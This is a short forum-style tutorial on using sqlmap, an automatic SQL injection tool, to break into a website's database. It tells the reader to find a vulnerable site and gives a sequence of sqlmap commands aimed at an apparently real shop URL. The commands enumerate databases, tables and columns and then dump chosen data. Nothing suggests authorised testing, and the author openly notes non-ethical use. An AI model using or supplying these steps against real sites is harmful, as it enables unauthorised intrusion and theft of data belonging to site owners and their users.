SQLmap Tutorial
by Scale
*NOTE: This is Linux not Windows!*
What is SQLmap? SQLmap is an open source automatic SQL Injection and database takeover tool. This is mainly used for "Ethical" hacking, but it can be used for non-ethical hacking.
Lets Begin Find a target site (Must be SQL Vulnerable).
Test Subject Site:
Spoiler Show
Input this Line in your SQLmap terminal (Replace the URL I placed with your targets)
Code:
# sqlmap -u http://www.ibookavenue.com/addcart.php?id=2' --dbsOnce it has found the Databases it should look like this:
Spoiler Show
The "Available databases" are the databases in your Targeted URL
[*]Now you are going to want to find the Tables in the database (Change databasename to the database you want to find tables in)
Code:
# sqlmap -u http://www.ibookavenue.com/addcart.php?id=2' -D databasename --tables[*]
You should have gotten a list of tables
[*]Now you are going to want to find Columns using in the tables (Change tablename to the table you would like to find Columns in)
Code:
# sqlmap -u http://www.ibookavenue.com/addcart.php?id=2' -D databasename -T tablename --columns[*]Now we will want to retrieve the Data (Change ColumnName1,2,3 to the desired Columns you want to dump)
Code:
# sqlmap -u http://www.ibookavenue.com/addcart.php?id=2' -D databasename -T tablename -C columnname1,columnname2,columnname3 --dump[*]After this it should say what directory the information has been stored to, where you can access it whenever you'd like!
![[Image: fi1z8QY.jpg]](http://i.imgur.com/fi1z8QY.jpg)
